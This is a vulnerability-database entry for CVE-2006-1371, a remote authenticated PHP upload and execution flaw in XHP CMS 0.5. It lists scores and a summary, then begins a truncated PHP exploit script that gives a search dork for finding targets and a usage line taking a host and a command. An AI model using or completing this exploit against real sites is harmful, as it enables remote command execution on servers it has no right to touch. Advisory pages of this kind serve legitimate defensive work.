9
CVSSv2

CVE-2006-1371

Published: 23/03/2006 Updated: 11/10/2017
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5 and previous versions allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using (1) manager.php, (2) standalonemanager.php, and (3) images.php.

Vulnerable Product Search on Vulmon Subscribe to Product

xhp cms

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "XHP CMS <= 05 remote cmmnds xctn\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "dork: \"powered by XHP CMS\"\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: target server (ip/hostna ...